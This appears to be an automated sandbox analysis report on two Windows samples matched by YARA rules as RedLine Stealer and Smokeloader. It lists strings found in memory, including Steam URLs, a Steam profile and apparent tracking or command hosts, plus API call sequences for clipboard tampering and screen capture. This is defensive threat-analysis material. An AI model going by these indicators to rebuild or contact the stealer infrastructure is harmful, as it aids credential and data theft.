Source: 89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
Source: 89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: 89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: NDWffRLk7z.exe, 00000004.00000002.3748901617.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: NDWffRLk7z.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: NDWffRLk7z.exe, 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: NDWffRLk7z.exe, 00000004.00000002.3748901617.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: NDWffRLk7z.exe, 00000004.00000002.3748901617.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEPL
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com
Source: 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 89AC.tmp.exe, 00000007.00000003.1381500917.00000000007EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 89AC.tmp.exe, 00000007.00000003.1381500917.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1601957338.00000000007E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900$
Source: 89AC.tmp.exe, 00000007.00000003.1381500917.00000000007EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900z
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381500917.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 89AC.tmp.exe, 00000007.00000003.1381500917.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 89AC.tmp.exe, 00000007.00000003.1381500917.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.11:49730 version: TLS 1.2

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

4_2_004016DF

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		4_2_004016DF
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02111942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		4_2_02111942

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

4_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe

Code function: 7_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,

7_2_00436980

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000007.00000002.1601705036.0000000000793000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.3748774798.000000000058A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02112357 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		4_2_02112357
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_021125FB NtdllDefWindowProc_W,PostQuitMessage,		4_2_021125FB

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00428012	4_2_00428012
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_004071A1	4_2_004071A1
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_004373C9	4_2_004373C9
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00427474	4_2_00427474
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0042D4DE	4_2_0042D4DE
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00428550	4_2_00428550
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0043D668	4_2_0043D668
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0041669F	4_2_0041669F
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00413715	4_2_00413715
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_004277E6	4_2_004277E6
